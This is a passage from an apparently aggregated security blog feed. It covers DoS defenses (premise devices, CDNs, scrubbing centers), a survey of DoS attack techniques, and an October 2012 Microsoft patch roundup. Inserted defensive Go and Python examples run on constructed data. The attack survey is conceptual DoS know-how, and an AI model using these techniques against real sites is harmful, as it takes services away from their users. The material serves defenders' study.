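	if t.sessions[src] > 0 {
		t.sessions[src]--
		t.total--
	}
}

func main() {
	t, err := NewTriage(1000, 10, []string{"203.0.113.0/24"})
	if err != nil {
		panic(err)
	}
	// Constructed sample: one normal client, one listed bot, one unlisted
	// source opening far more sessions than a real client would.
	flows := []Flow{{Src: "192.0.2.10", Dst: "198.51.100.1:443"}}
	for i := 0; i < 5; i++ {
		flows = append(flows, Flow{Src: "203.0.113.77", Dst: "198.51.100.1:443"})
	}
	for i := 0; i < 50; i++ {
		flows = append(flows, Flow{Src: "192.0.2.200", Dst: "198.51.100.1:443"})
	}
	for _, f := range flows {
		t.Process(f)
	}
	fmt.Println(t.Counts)
}
```

The ordering is the whole point: the reputation lookup costs a prefix match and no memory, the per-source cap protects the table from a single source, and only then does the global capacity check apply. A real device would age sessions out on its own rather than waiting for an explicit Close.<br />
<br />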
But anti-DoS devices include their own limitations. First and foremost is the simple fact that if your pipes are overwhelmed, a device on your premises is irrelevant. Additionally, SSL attacks are increasing in frequency. It’s cheap for an army of bots to use SSL to encrypt all their attack traffic, but expensive for a network security device to terminate all SSL sessions and check all their payloads for attacks. That kind of computational cost arbitrage puts defenders in a world of hurt. Even load balancers, which are designed to terminate high SSL volumes, can face challenges dealing with SSL DoS attacks, due to session management limitations.<br />
<br />
So an anti-DoS device needs to integrate a number of existing capabilities such as IPS, network behavioral analysis, WAF, and SSL termination, combining them with highly scalable session management to cope with DoS attacks. And all that is still not enough – you will always be limited by the amount of bandwidth coming into your site. That brings us to network services, as a complement to premise-based devices.<br />
<br />
<h2>Proxies & CDN</h2><br />
The first service option most organizations consider is a Content Delivery Network (CDN). These services enhance web site performance by strategically caching content. Depending on the nature of your site, a CDN might be able to dramatically reduce your ingress network traffic – if they can cache much of your static content. They also offer some security capabilities, especially for dealing with DoS attacks. The CDN acts as a proxy for your web site, so the provider can protect your site by using its own massive bandwidth to cope with DoS attacks for you. They have significant global networks, so even a fairly large volumetric attack shouldn’t look much different than a busy customer day – say a software company patching an operating system for a hundred million customers. Their scale enables them to cope with much larger traffic onslaughts than your much smaller pipes. Another advantage of a CDN is its ability to obscure the real IP addresses of your site, making it more difficult for attackers to target your servers. CDNs can also handle SSL termination if you allow them to store your private keys.<br />
<br />
What’s the downside? Protecting each site individually. If one site is <em>not</em> running through the CDN, attackers can find it through some simple reconnaissance and blast the vulnerable site. Even for sites running through the CDN, if attackers can find your controlling IPs they can attack you directly, bypassing the CDN. Then you need to mitigate the attack directly. Attackers also can randomize web page and image requests, forcing the CDN to request what it thinks is dynamic content directly from your servers over and over again. These cache misses can effectively cause the CDN to attack your servers. Obviously you want the CDN to be smart enough to detect these attacks before they melt your pipes and servers.<br />
<br />
Also be wary of excessive bandwidth costs. At the low end of the market, CDNs charge a flat fee and just eat the bandwidth costs if a small site is attacked. But enterprise deals are a bit more involved, charging for both bandwidth and protection. A DoS attack can explode bandwidth costs, causing an “economic DoS”, and perhaps shutting down the site when the maximum threshold (by contract or credit card limit) is reached. When setting up contracts, make sure you get some kind of protection from excessive bandwidth charges in case of attack.<br />
<br />
<h2>Anti-DoS Service Providers</h2><br />
CDN limitations require some organizations to consider more focused network-based anti-DoS service providers. These folks run <em>scrubbing centers</em> – big data centers with lots of anti-DoS mitigation gear to process inbound floods and keep sites available. You basically flip a switch to send your traffic through the scrubbing center once you detect an attack. This switch usually controls BGP routing, so as soon as DNS updates and the network converge the scrubbing center handles all inbound traffic. On the backend you receive legitimate traffic through a direct connection – GRE tunnels to leverage the Internet, or a dedicated network link from the scrubbing center. Obviously there is latency during redirection, so keep that in mind.<br />
<br />
But what does a scrubbing center actually do? The same type of analysis as a premise-based device. The scrubbing center manages sessions, drops traffic based on network telemetry and IP reputation, blocks application-oriented attacks, and otherwise keeps your site up and available. Most scrubbing centers have substantial anti-DoS equipment footprints, amortized across all their customers. You pay for what you need, when you need it, rather than overprovisioning your network and buying a bunch of anti-DoS equipment for whenever you are actually attacked.<br />
<br />
Getting back to our email security analogy, think of an anti-DoS service provider like a cloud email security service. Back in the early days of spam, most organizations implemented their own email security gateways to deal with spam. When the inbound volume of email overwhelmed the gateways, organizations had to deploy more gateways and email filter hardware. This made anti-spam gateways a good business, until a few service providers started selling cloud services to deal with the issue. Just route your mail through their networks, and only good stuff would actually get delivered to your email servers. Spam flood? No problem – it’s the provider’s problem. Obviously there are differences – particularly that email filtering is full-time, while DoS filtering is on-demand during attacks.<br />
<br />
There are, of course, issues with this type of service, aside from the inevitable latency, which causes disruption while you reroute traffic to the scrubbing center. Scrubbing centers have the same SSL requirement as CDNs: termination requires access to your private key. Depending on your security tolerance, this could be a serious problem. Many large sites have tons of certificates and can cross-sign keys for the scrubbing center, but it does complicate management of the service provider.<br />
<br />
You will also need to spell out a process for determining when to redirect traffic. We will talk about this more when we go through the DoS defense process, but it generally involves an internal workflow to detect emerging attacks, evaluation of the situation, and then a determination to move the traffic – typically rerouting via BGP. But if your anti-DoS provider uses the same equipment as you have on-site, that might offer proprietary signaling protocols to automatically shift traffic based on thresholds. Though some network operations folks don’t enjoy letting Skynet redirect their traffic through different networks. What could possibly go wrong with that?<br />
<br />
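The divert-and-return decision that the workflow above has to make, as an added example that is not from the post or from any provider's signaling protocol: a model that compares each telemetry interval against a learned baseline and only changes routing after a sustained excursion, with separate thresholds for diverting and returning. The baseline, the factors, the sustain count and the traffic series are constructed; the BGP change itself is represented only by the returned events, which is where a real implementation would trigger the route announcement.<br />

```go
package main

import "fmt"

// Sample is one measurement interval of ingress traffic from the network
// telemetry the workflow watches. The values used below are constructed.
type Sample struct {
	Interval int     // sequence number of the interval
	Mbps     float64 // inbound bandwidth observed in the interval
}

// Redirector decides when traffic should be diverted to a scrubbing center
// and when it should come back. Two thresholds plus a sustain count give the
// hysteresis that stops an expensive BGP flip on a single noisy interval.
type Redirector struct {
	BaselineMbps float64 // learned normal ingress (constructed here)
	OnFactor     float64 // divert once traffic exceeds BaselineMbps*OnFactor
	OffFactor    float64 // return once traffic drops below BaselineMbps*OffFactor
	Sustain      int     // consecutive intervals required before either change

	Diverted    bool // current routing state
	aboveStreak int  // consecutive intervals above the divert threshold
	belowStreak int  // consecutive intervals below the return threshold
}

// Event is emitted when the routing state should change.
type Event struct {
	Interval int
	Action   string // "divert" or "return"
	Mbps     float64
}

// Observe feeds one interval and reports whether the state changed.
func (r *Redirector) Observe(s Sample) (Event, bool) {
	if !r.Diverted {
		if s.Mbps > r.BaselineMbps*r.OnFactor {
			r.aboveStreak++
		} else {
			r.aboveStreak = 0 // a lone spike does not count
		}
		if r.aboveStreak >= r.Sustain {
			r.Diverted, r.aboveStreak = true, 0
			return Event{Interval: s.Interval, Action: "divert", Mbps: s.Mbps}, true
		}
		return Event{}, false
	}
	if s.Mbps < r.BaselineMbps*r.OffFactor {
		r.belowStreak++
	} else {
		r.belowStreak = 0 // the flood is not over yet
	}
	if r.belowStreak >= r.Sustain {
		r.Diverted, r.belowStreak = false, 0
		return Event{Interval: s.Interval, Action: "return", Mbps: s.Mbps}, true
	}
	return Event{}, false
}

// Run replays a series of interval measurements and returns the routing changes.
func Run(r *Redirector, mbps []float64) []Event {
	var events []Event
	for i, m := range mbps {
		if ev, changed := r.Observe(Sample{Interval: i, Mbps: m}); changed {
			events = append(events, ev)
		}
	}
	return events
}

func main() {
	r := &Redirector{BaselineMbps: 200, OnFactor: 5, OffFactor: 2, Sustain: 3}
	// Constructed telemetry: a normal day, a one-interval spike that must be
	// ignored, a sustained flood, then recovery.
	series := []float64{180, 220, 1500, 190, 1400, 1600, 1800, 1700, 900, 300, 250, 210}
	for _, ev := range Run(r, series) {
		fmt.Printf("interval %d: %s at %.0f Mbps\n", ev.Interval, ev.Action, ev.Mbps)
	}
}
```

With these settings the lone 1500 Mbps interval is ignored, the divert fires on the third consecutive interval above 1000 Mbps, and the return fires only after three consecutive intervals under 400 Mbps, so the site is not flapped back onto its own pipes while the flood is still tailing off.<br />
<br />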
Selection of an anti-DoS service provider is a serious decision. We recommend a fairly formal procurement process, which enables you to understand the provider’s technical underpinnings, network architecture, available bandwidth, geographic distribution, ability to handle SSL attacks, underlying anti-DoS equipment, and support for various signaling protocols. Make sure you are comfortable with the robustness of their DNS infrastructure, because DNS is a popular target and critical to several defenses. Also pay close attention to process hand-offs, responsiveness of their support group, and their research capabilities (to track attackers and mitigate specific attacks).<br />
<br />
<h2>The Answer: All of the Above</h2><br />
Ultimately your choice of network-based DoS mitigations will involve trade-offs. It is never good to over-generalize, but most organizations will be best served by a hybrid approach, involving both a customer premise-based appliance and contracting with a CDN or anti-DoS service provider to handle severe volumetric attacks. It is simply not cost-effective to run all your traffic through a scrubbing center constantly, and many DoS attacks target the application layer – demanding use of a customer premise device anyway.<br />
<br />
In terms of service provider defense, many organizations can (and should) get started with a CDN. The CDN may be more attractive initially for its performance benefits, with anti-DoS and WAF capabilities as nice extras. Until you are attacked – at which point, depending on the nature of the attack, the CDN may save your proverbial bacon. If you are battling sophisticated attackers, or have a complicated and/or enterprise class infrastructure, you are likely looking at contracting with a dedicated anti-DoS service provider. Again, this will usually be a retainer-based relationship which gives you the ability to route your traffic through the scrubbing center when necessary – paying when you are under attack and sending them traffic.<br />
<br />
All this assumes your sites reside within your data center. Cloud computing fundamentally alters the calculations, requiring different capabilities and architectures. If your apps reside in the cloud you don’t <em>have</em> a customer premise where you can install devices, so you would instead consider either a virtual instance, routing traffic through your site before it hits the cloud, or using a CDN for all inbound traffic. You could also architect your cloud infrastructure to provision more instances as necessary to handle traffic, but it is easy to convert a DoS attack into an economic attack as you pay to scale up in order to handle bogus traffic. There are no clear answers yet – it is still very early in the evolution of cloud computing – but it is something to factor in as your application architects keep talking about this <em>cloud thingy</em>.<br />
<br />
Next we will address the <em>application</em> side of the DoS equation, before we wrap up with the DoS Defense process.<br />
<br />
- Mike Rothman<br />
(0) <a href="https://securosis.com/blog/defending-against-dos-attacks-defense-part-1-the-network">Comments</a>Kiran Vangavetihttp://www.blogger.com/profile/16789033014764600040noreply@blogger.comtag:blogger.com,1999:blog-9013159124343782843.post-6117988935954155782012-10-09T12:15:00.001-07:002012-10-09T12:15:06.491-07:00Microsoft Patch Tuesday, October 2012 – Legend of Zelda Edition<a href="http://feedproxy.google.com/~r/SpiderlabsAnterior/~3/GstPqdZWO48/microsoft-patch-tuesday-october-2012-legend-of-zelda.html">Microsoft Patch Tuesday, October 2012 – Legend of Zelda Edition</a>: <br />
<div>Hope you enjoyed last month's light Patch Tuesday with only two bulletins, as this month we are right back at it with seven bulletins covering everything from Elevation of Privilege and Denial of Service to Remote Code Execution. There is only one critical update this month, but there is also the enforcement of 1024-bit digital certificates. Probably the most interesting patch this month involves Lync, Microsoft’s enterprise messaging system, if only for the reason that every time I read Lync I think Link, as in the hero of Nintendo’s Legend of Zelda, which I spent way too much time playing back in the eighties.<br />
Much like Link needs to get keys to open doors in Hyrule, Microsoft products will often use certificates to allow communication between products. As of today Microsoft products will reject any certificates with RSA keys of less than 1024 bits. Microsoft has made an optional patch available for the last two months to enforce this rule, but now it is no longer optional. Even if you are not using 512-bit keys, this is an excellent opportunity to update all your keys to 1024 bits or even more.<br />
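A check for the key-size rule just described, as an added example rather than anything from the Trustwave post or from Microsoft: it reports the certificates in a list whose RSA modulus is shorter than 1024 bits, which are the ones that will be rejected once the enforcement is in place. The certificates are built inside the example (one 2048-bit self-signed certificate, plus stand-in certificate objects carrying a synthetic 512-bit and 1024-bit modulus, because current Go releases refuse to generate or sign with keys that small), and the subject names are constructed placeholders. On a Windows host the same inventory would be taken from the machine's certificate store, which this offline example does not touch.<br />

```go
package main

import (
	"crypto/rand"
	"crypto/rsa"
	"crypto/x509"
	"crypto/x509/pkix"
	"fmt"
	"math/big"
	"time"
)

// MinRSABits is the floor the update enforces.
const MinRSABits = 1024

// RSAKeyBits returns the modulus size of a certificate's RSA public key.
// The second value is false for non-RSA keys, which this check does not cover.
func RSAKeyBits(cert *x509.Certificate) (int, bool) {
	pub, ok := cert.PublicKey.(*rsa.PublicKey)
	if !ok {
		return 0, false
	}
	return pub.N.BitLen(), true
}

// WeakRSACerts lists the subjects of certificates whose RSA key is smaller
// than minBits, i.e. those that will be rejected after the update.
func WeakRSACerts(certs []*x509.Certificate, minBits int) []string {
	var weak []string
	for _, c := range certs {
		if bits, ok := RSAKeyBits(c); ok && bits < minBits {
			weak = append(weak, fmt.Sprintf("%s (%d bits)", c.Subject.CommonName, bits))
		}
	}
	return weak
}

// selfSigned builds a throwaway self-signed certificate with a fresh RSA key
// of the given size, standing in for an entry from a real certificate store.
func selfSigned(cn string, bits int) (*x509.Certificate, error) {
	key, err := rsa.GenerateKey(rand.Reader, bits)
	if err != nil {
		return nil, err
	}
	tmpl := &x509.Certificate{
		SerialNumber: big.NewInt(1),
		Subject:      pkix.Name{CommonName: cn}, // constructed placeholder name
		NotBefore:    time.Now(),
		NotAfter:     time.Now().Add(24 * time.Hour),
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, tmpl, &key.PublicKey, key)
	if err != nil {
		return nil, err
	}
	return x509.ParseCertificate(der)
}

// weakStandIn builds a certificate object carrying a synthetic RSA modulus of
// exactly the requested bit length, without signing anything with it: Go
// itself will not generate or sign with sub-1024-bit keys, which is the very
// property being checked here.
func weakStandIn(cn string, bits int) *x509.Certificate {
	n := new(big.Int).Lsh(big.NewInt(1), uint(bits-1)) // BitLen() == bits
	return &x509.Certificate{
		Subject:   pkix.Name{CommonName: cn},
		PublicKey: &rsa.PublicKey{N: n, E: 65537},
	}
}

// Inventory runs the check over the constructed sample store.
func Inventory() ([]string, error) {
	strong, err := selfSigned("app.example.test", 2048)
	if err != nil {
		return nil, err
	}
	certs := []*x509.Certificate{
		strong,
		weakStandIn("legacy.example.test", 512),
		weakStandIn("border.example.test", 1024), // exactly at the floor: still accepted
	}
	return WeakRSACerts(certs, MinRSABits), nil
}

func main() {
	weak, err := Inventory()
	if err != nil {
		panic(err)
	}
	fmt.Println("will be rejected after the update:", weak)
}
```

Note the comparison is strictly less than 1024, matching the rule as stated; a key of exactly 1024 bits passes, although the post's advice to go larger still stands.<br />
<br />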
<a href="http://npercoco.typepad.com/.a/6a0133f264aa62970b017c326b23ac970b-pi" style="float: right;"><img alt="KeyLoZ" border="0" src="http://npercoco.typepad.com/.a/6a0133f264aa62970b017c326b23ac970b-800wi" style="margin: 0px 0px 5px 5px;" title="KeyLoZ" /></a><br />
<br />
<br />
<strong>MS12-064 (KB 2742319)</strong><br />
<strong><span style="color: red;">CRITICAL</span></strong><br />
<em>Remote Code Execution in Microsoft Word</em><br />
CVE-2012-0182<br />
CVE-2012-2528<br />
A specially crafted RTF file could allow an attacker to take complete control of a system to install their own programs, delete data or even create new accounts. (Sounds like something a WallMaster would do.) The vulnerability is present in most versions of Microsoft Word 2003, 2007 and 2010, and even SharePoint Server 2010 SP1, and is caused by how Word handles memory when parsing certain files. This one can be a little tricky because Microsoft Word is set as the default mail reader in Outlook 2007 and 2010, which means that an attacker could leverage email as the attack vector to get you to open the specially crafted RTF file. This vulnerability has been hidden away in a dungeon (probably the Manji Dungeon) and has not yet been seen in the wild.<br />
<a href="http://npercoco.typepad.com/.a/6a0133f264aa62970b017c326b2429970b-pi" style="float: right;"><img alt="WallmasterLoZ" border="0" src="http://npercoco.typepad.com/.a/6a0133f264aa62970b017c326b2429970b-800wi" style="margin: 0px 0px 5px 5px;" title="WallmasterLoZ" /></a><br />
<br />
<strong>MS12-065 (KB 27546070)</strong><br />
<strong><span style="color: #ff7f00;">IMPORTANT</span></strong><br />
<em>Remote Code Execution in Microsoft Works</em><br />
CVE-2012-2550<br />
The last time I used Microsoft Works was version 2.0 on my Mac SE, so I was surprised to learn that the current version is 9.0 and is still a supported and even a shipping product. Works 9.0 is still available at retail but is mostly used by OEMs to include with systems. If you are using Works 9.0 you will want to pay attention to this one, especially if you try to open Microsoft Word files with your version of Works. When Works attempts to convert a Word file it can potentially cause system memory corruption that could allow an attacker to execute arbitrary code. If you are using an older version of Microsoft Works you should really think about upgrading. Microsoft doesn’t mention whether the vulnerability exists in older versions, since they are no longer supported, so to be safe you will want to upgrade.<br />
<br />
<strong>MS12-066 (KB 2741517)</strong><br />
<strong><span style="color: #ff7f00;">IMPORTANT</span></strong><br />
<em>Elevation of Privilege in HTML Sanitization</em><br />
CVE-2012-2520<br />
<em>“But wait! All was not lost. A young lad appeared. He skillfully drove off Ganon’s henchmen and saved Impa from a fate worse than death. His name was Link.”<br />
<a href="http://npercoco.typepad.com/.a/6a0133f264aa62970b017ee40ef5d4970d-pi" style="float: right;"><img alt="Link_NES" border="0" src="http://npercoco.typepad.com/.a/6a0133f264aa62970b017ee40ef5d4970d-800wi" style="margin: 0px 0px 5px 5px;" title="Link_NES" /></a></em><br />
OK, this one affects more than just Lync, but also InfoPath, Communicator, SharePoint, Groove and Office Web Apps. However, as soon as I read Lync I immediately thought of our intrepid hero and his quest to save the lovely princess Zelda. But instead of being hunted by the evil forces of Ganon, this Lync is hunted by poorly sanitized HTML strings. The bad strings could allow cross-site scripting attacks that could run scripts in the context of the logged-on user. If you try to get the full Lync update through Automatic Update you won’t find it. The update for Lync 2010 Attendee (user level install) has to be handled through a Lync session, so the update is only available in the Microsoft Download Center. This one has escaped the dungeon and has been seen on a limited basis in the wild. (Just hiding under the sand like a Peahat waiting to get you.)<br />
<a href="http://npercoco.typepad.com/.a/6a0133f264aa62970b017c326b1adf970b-pi" style="float: right;"><img alt="PeahatSprite" border="0" src="http://npercoco.typepad.com/.a/6a0133f264aa62970b017c326b1adf970b-800wi" style="margin: 0px 0px 5px 5px;" title="PeahatSprite" /></a><br />
<br />
<strong>MS12-067 (KB 2742321)</strong><br />
<strong><span style="color: #ff7f00;">IMPORTANT</span></strong><br />
<em>Remote Code Execution in SharePoint FAST Search Server 2010</em><br />
CVE-2012-1766<br />
You only need to worry about this patch if you have the Advanced Filter Pack enabled on your FAST Search Server 2010 for SharePoint; it’s disabled by default. Exploitation of this vulnerability could allow an attacker to run arbitrary code in the context of a user account with a restricted token (Orange Rupee?). The flaw is actually in the Oracle Outside In libraries licensed by Microsoft. This is at least the second recent vulnerability we have seen in these libraries. While this one has not yet been seen in the wild, Microsoft thinks that code to exploit this vulnerability is likely to exist within the next thirty days.<br />
<a href="http://npercoco.typepad.com/.a/6a0133f264aa62970b017ee40edf32970d-pi" style="float: right;"><img alt="OrangeRupee" border="0" src="http://npercoco.typepad.com/.a/6a0133f264aa62970b017ee40edf32970d-800wi" style="margin: 0px 0px 5px 5px;" title="OrangeRupee" /></a> <br />
<br />
<strong>MS12-068 (KB 2724197)</strong><br />
<strong><span style="color: #ff7f00;">IMPORTANT</span></strong><br />
<em>Elevation of Privilege in Windows Kernel</em><br />
CVE-2012-2529<br />
I hate reading “all supported releases of Microsoft Windows”; it sends shivers up my spine like a Stalfos. However, this statement was closely followed by “except Windows 8 and Windows Server 2012”, which isn’t much consolation, but I’ll take it. This is a classic elevation of privilege requiring an attacker to already have access to a system, either through legitimate credentials or some other vulnerability. Once inside, an attacker could use this vulnerability to gain administrator level access.<br />
<a href="http://npercoco.typepad.com/.a/6a0133f264aa62970b017ee40ef394970d-pi" style="float: right;"><img alt="LoZ_Stalfos_gray" border="0" src="http://npercoco.typepad.com/.a/6a0133f264aa62970b017ee40ef394970d-800wi" style="margin: 0px 0px 5px 5px;" title="LoZ_Stalfos_gray" /></a><br />
<br />
<strong>MS12-069 (KB 2743555)</strong><br />
<strong><span style="color: #ff7f00;">IMPORTANT</span></strong><br />
<em>Denial of Service in Kerberos</em><br />
CVE-2012-2551<br />
Unlike MS12-068, which affects just about everything, MS12-069 is <em>only</em> found in Windows 7 and Server 2008 R2. A specially crafted session request to the Kerberos server could result in a denial of service. If you have a properly configured firewall in place it will help protect your network from external attacks, sort of like Link’s shield protects against Tektites. Of course that won’t do much good if the attacker is already inside your network.<br />
<a href="http://npercoco.typepad.com/.a/6a0133f264aa62970b017c326b2f0a970b-pi" style="float: right;"><img alt="Tektite_LoZOrange" border="0" src="http://npercoco.typepad.com/.a/6a0133f264aa62970b017c326b2f0a970b-800wi" style="margin: 0px 0px 5px 5px;" title="Tektite_LoZOrange" /></a><br />
<br />
<strong>MS12-070 (KB 2754849)</strong><br />
<strong><span style="color: #ff7f00;">IMPORTANT</span></strong><br />
<em>Elevation of Privilege in SQL Server</em><br />
CVE-2012-2552<br />
If you are running the SQL Server Reporting Service then you have a problem validating input parameters which, if exploited, could cause an elevation of privilege. The XSS filter in Internet Explorer 8, 9, and 10 can protect users against this attack <em>if</em> it is enabled in the Intranet Zone, which is not the default. You can enable it by going to Internet Options -> Security Settings -> Intranet Zone -> Custom Level -> Enable XSS Filter, or just apply the patch offered through Automatic Updates. If you decide to do neither and a user clicks on a specially crafted link in email or browses to a specially crafted webpage, well, game over.<br />
<br />
<div style="text-align: center;"><em>“Can Link really destroy Ganon and save princess Zelda?”</em></div><div style="text-align: center;"><em>“Only your skill can answer that question. Good luck. Use the Triforce wisely.”</em></div><a href="http://npercoco.typepad.com/.a/6a0133f264aa62970b017d3c998314970c-pi" style="display: inline;"><img alt="240px-Triforce_Logo" border="0" src="http://npercoco.typepad.com/.a/6a0133f264aa62970b017d3c998314970c-800wi" style="display: block; margin-left: auto; margin-right: auto;" title="240px-Triforce_Logo" /></a><br />
</div>Kiran Vangavetihttp://www.blogger.com/profile/16789033014764600040noreply@blogger.comtag:blogger.com,1999:blog-9013159124343782843.post-55660066506546872122012-10-05T13:58:00.001-07:002012-10-05T13:58:26.329-07:00Defending Against DoS Attacks: The Attacks<a href="https://securosis.com/blog/defending-against-dos-attacks-the-attacks">Defending Against DoS Attacks: The Attacks</a>: <br />
<a href="https://securosis.com/blog/defending-against-denial-of-service-dos-attacks-new-blog-series">Our first post</a> built a case for considering availability as an aspect of security context, rather than only confidentiality and integrity. This has been driven by Denial of Service (DoS) attacks, which are used by attackers in many different ways, including extortion (using the threat of an attack), obfuscation (to hide exfiltration), hacktivism (to draw attention to a particular cause), or even friendly fire (when a promotion goes a little too well).<br />
<br />
Understanding the adversary and their motivation is one part of the puzzle. Now let’s look at the types of DoS attacks you may face – attackers have many arrows in their quivers, and use them all depending on their objectives and targets.<br />
<br />
<h2>Flooding the Pipes</h2><br />
The first kind of Denial of Service attack is really a blunt force object. It’s basically about trying to oversubscribe the bandwidth and computing resources of network (and increasingly server) devices to impact resource availability. These attacks aren’t very sophisticated, but as evidenced by the ongoing popularity of volume-based attacks, they are fairly effective. These tactics have been in use since before the Internet bubble, leveraging largely the same approach. But they have gotten easier with bots to do the heavy lifting. Of course, this kind of blasting must be done somewhat carefully to maintain the usefulness of the bot, so bot masters have developed sophisticated approaches to ensure their bots avoid ISPs’ penalty boxes. So you will see limited bursts of traffic from each bot and a bunch of IP address spoofing to make it harder to track down where the traffic is coming from, but even short bursts from 100,000+ bots can flood a pipe.<br />
<br />
Quite a few specific techniques have been developed for volumetric attacks, but most look like some kind of <em>flood</em>. In a network context, the attackers focus on overfilling the pipes. Floods target specific protocols (SYN, ICMP, UDP, etc.), and work by sending requests to a target using the chosen protocol, but not acknowledging the response. Enough of these outstanding requests limit the target’s ability to communicate. But attackers need to stay ahead of Moore’s Law, because targets’ ability to handle floods has improved with processing power. So network-based attacks may include encrypted traffic, forcing the target to devote additional computational resources to process massive amounts of SSL traffic. Given the resource-intensive nature of encryption, this type of attack can melt firewalls and even IPS devices unless they are configured specifically for large-scale SSL support. We also see some malformed protocol attacks, but these aren’t as effective nowadays, as even unsophisticated network security perimeter devices drop bad packets at wire speed.<br />
<br />
These volume-based attacks are climbing the stack as well, targeting web servers by actually completing connection requests and then making a simple GET request and resetting the connection over and over again, with approximately the same impact as a volumetric attack – over-consumption of resources effectively knocking down servers. These attacks may also include a large payload to further consume bandwidth. The now famous <a href="http://en.wikipedia.org/wiki/Low_Orbit_Ion_Cannon">Low Orbit Ion Cannon</a>, a favorite tool of the hacktivist crowd, has undertaken a similar evolution, first targeting network resources and proceeding to now target web servers as well. It gets even better – these attacks can be <em>magnified</em> to increase their impact by simultaneously spoofing the target’s IP address and requesting sessions from thousands of <em>other</em> sites, which then bury the target in a deluge of misdirected replies, further consuming bandwidth and resources.<br />
<br />
Fortunately defending against these network-based tactics isn’t overly complicated, as we will discuss in the next post, but without a sufficiently large network device at the perimeter to block these attacks or an upstream service provider/traffic scrubber to dump offending traffic, devices fall over in short order.<br />
<br />
<h2>Overwhelming the Application</h2><br />
But attackers don’t only attack the network – they increasingly attack the applications as well, following the rest of attackers up the stack. Your typical <em>n</em>-tier web application will have some termination point (usually a web server), an application server to handle application logic, and then a database to store the data. Attackers can target all tiers of the stack to impact application availability. So let’s dig into each layer to see how these attacks work.<br />
<br />
The termination point is usually the first target in application DoS attacks. They started with simple GET floods as described above, but quickly evolved to additional attack vectors. The best known application DoS attack is probably <a href="http://ha.ckers.org/slowloris/">RSnake’s Slowloris</a>, which consumes web server resources by sending partial HTTP requests, effectively opening connections and then leaving the sessions open by sending additional headers at regular intervals. This approach is far more efficient than the GET flood, requiring only hundreds of requests at regular intervals rather than constant thousands, and only requires one device to knock down a large site. These application attacks have evolved over time and now send complete HTTP requests to evade IDS and WAF devices looking for incomplete HTTP requests, but they tamper with payloads to confuse applications and consume resources. As defenders learn the attack vectors and deploy defenses, attackers evolve their attacks. The cycle continues.<br />
<br />
Web server based attacks can also target weaknesses in the web server platform. For example the <a href="https://issues.apache.org/bugzilla/show_bug.cgi?id=51714">Apache Killer attack</a> sends a malformed HTTP range request to take advantage of an Apache vulnerability. The Apache folks quickly patched the code to address this issue, but it shows how attackers target weaknesses in the underlying application stack to knock the server over. And of course unpatched Apache servers are still vulnerable today at many organizations. Similarly, the RefRef attack leverages SQL injection to inject a rogue <code>.js</code> file onto a server, which then hammers a backend database into submission with seemingly legitimate traffic originating from an application server. Again, application and database server patches are available for the underlying infrastructure, but vulnerability remains if either patch is missing.<br />
<br />
Attackers can also target legitimate application functionality. One example of such an attack targets the search capability within a web site. If an attacker scripts a series of overly broad searches, the application can waste a large amount of time polling the database and presenting results. Likewise, attackers can game shopping carts by opening many shopping sessions, adding thousands of items to each cart, constantly refreshing the carts, and then abandoning them. Unless the application is architected to handle these use cases efficiently, such attacks accomplish their goals. For most sites, failing to return search results or track shopping carts is a complete failure with severe business ramifications, which is exactly the success scenario for a DoS attack.<br />
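As an added illustration of the application-level abuse described here and the GET-flood pattern from the previous section, the following Python is not from the original post or from Securosis. It runs a small detector over a constructed Apache-style access-log sample: it tracks each client's request rate inside a sliding window and counts search requests whose term is empty, wildcard-only, or very short. The thresholds, the <code>/search?q=</code> layout and the client addresses are assumptions for the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

# Constructed Apache-style access log (not real traffic). Two ordinary clients
# browse normally; 192.0.2.44 hammers the search page with wildcard or
# near-empty terms inside a ten-second window. One junk line exercises parsing.
SAMPLE_LOG = """\
203.0.113.10 - - [05/Oct/2012:10:00:01 -0700] "GET /index.html HTTP/1.1" 200 5120
192.0.2.44 - - [05/Oct/2012:10:00:02 -0700] "GET /search?q=* HTTP/1.1" 200 91822
192.0.2.44 - - [05/Oct/2012:10:00:02 -0700] "GET /search?q=%25 HTTP/1.1" 200 91822
192.0.2.44 - - [05/Oct/2012:10:00:03 -0700] "GET /search?q=a HTTP/1.1" 200 70411
203.0.113.10 - - [05/Oct/2012:10:00:04 -0700] "GET /search?q=laptop+bag HTTP/1.1" 200 8891
192.0.2.44 - - [05/Oct/2012:10:00:04 -0700] "GET /search?q= HTTP/1.1" 200 91822
198.51.100.7 - - [05/Oct/2012:10:00:05 -0700] "GET /cart HTTP/1.1" 200 2210
192.0.2.44 - - [05/Oct/2012:10:00:05 -0700] "GET /search?q=* HTTP/1.1" 200 91822
192.0.2.44 - - [05/Oct/2012:10:00:06 -0700] "GET /search?q=%25%25 HTTP/1.1" 200 91822
192.0.2.44 - - [05/Oct/2012:10:00:07 -0700] "GET /search?q=laptop HTTP/1.1" 200 6120
this line is not a valid access log entry
192.0.2.44 - - [05/Oct/2012:10:00:08 -0700] "GET /search?q=* HTTP/1.1" 200 91822
203.0.113.10 - - [05/Oct/2012:10:00:09 -0700] "GET /product/17 HTTP/1.1" 200 3301
192.0.2.44 - - [05/Oct/2012:10:00:09 -0700] "GET /search?q=_ HTTP/1.1" 200 91822
192.0.2.44 - - [05/Oct/2012:10:00:10 -0700] "GET /cart HTTP/1.1" 200 2210
192.0.2.44 - - [05/Oct/2012:10:00:10 -0700] "GET /search?q=* HTTP/1.1" 200 91822
198.51.100.7 - - [05/Oct/2012:10:00:11 -0700] "POST /cart/add HTTP/1.1" 302 -
192.0.2.44 - - [05/Oct/2012:10:00:11 -0700] "GET /search?q=%25 HTTP/1.1" 200 91822
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)$'
)
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Parse one access-log line into a dict, or return None for unparseable input."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], TS_FORMAT),
        "method": m["method"],
        "target": m["target"],
        "status": int(m["status"]),
    }


def is_broad_search(target, min_len=3):
    """True for a /search request whose term is empty, wildcard-only, or shorter than min_len."""
    parts = urlsplit(target)
    if parts.path != "/search":
        return False
    term = parse_qs(parts.query).get("q", [""])[0].strip()   # parse_qs already percent-decodes
    return term == "" or all(c in "*%_" for c in term) or len(term) < min_len


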